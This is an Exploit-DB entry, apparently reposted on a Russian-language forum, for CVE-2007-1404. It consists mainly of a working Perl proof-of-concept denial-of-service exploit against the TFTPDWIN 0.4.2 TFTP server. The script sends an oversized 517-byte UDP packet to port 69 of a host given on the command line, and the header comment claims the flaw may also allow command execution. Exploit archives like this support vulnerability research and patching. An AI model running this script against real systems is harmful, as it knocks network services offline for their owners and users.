- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3432
- Проверка EDB
-
- Пройдено
- Автор
- UMESH WANVE
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2007-1404
- Дата публикации
- 2007-03-08
Код:
#!/usr/bin/perl
#
# TFTPDWIN Server UDP DOS 0.4.2 POC
# written By : Umesh Wanve ([email protected])
#
#-------------------------------------------------------------------------------
# TFTPDWIN Server is a Freeware TFTP server for Windows 9x/NT/XP.
# (http://www.tftpserver.prosysinfo.com.pl)
# A vulnerability has been identified in TFTP Server TFTPDWIN Server v0.4.2, which
# could be exploited by remote or local attackers to execute arbitrary commands
# or cause a denial of service. This flaw is when attacker sends UDP packet of length more than 516 bytes
#
#----------------------------Start of Code-------------------------------------
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "69",
Proto => "UDP"))
{
print $socket "A" x 517;
sleep(1);
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:69\n";
}
# milw0rm.com [2007-03-08]- Источник
- www.exploit-db.com
